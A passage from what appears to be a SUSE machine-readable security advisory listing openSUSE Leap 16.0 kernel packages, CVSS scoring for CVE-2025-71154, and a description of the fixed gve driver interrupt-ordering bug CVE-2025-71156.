"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngve: defer interrupt enabling until NAPI registration\n\nCurrently, interrupts are automatically enabled immediately upon\nrequest. This allows interrupt to fire before the associated NAPI\ncontext is fully initialized and cause failures like below:\n\n[ 0.946369] Call Trace:\n[ 0.946369] \u003cIRQ\u003e\n[ 0.946369] __napi_poll+0x2a/0x1e0\n[ 0.946369] net_rx_action+0x2f9/0x3f0\n[ 0.946369] handle_softirqs+0xd6/0x2c0\n[ 0.946369] ? handle_edge_irq+0xc1/0x1b0\n[ 0.946369] __irq_exit_rcu+0xc3/0xe0\n[ 0.946369] common_interrupt+0x81/0xa0\n[ 0.946369] \u003c/IRQ\u003e\n[ 0.946369] \u003cTASK\u003e\n[ 0.946369] asm_common_interrupt+0x22/0x40\n[ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10\n\nUse the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto\nenablement and explicitly enable the interrupt in NAPI initialization\npath (and disable it during NAPI teardown).\n\nThis ensures that interrupt lifecycle is strictly coupled with\nreadiness of NAPI context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71156",
"url": "https://www.suse.com/security/cve/CVE-2025-71156"
},
{
"category": "external",
"summary": "SUSE Bug 1257167 for CVE-2025-71156",
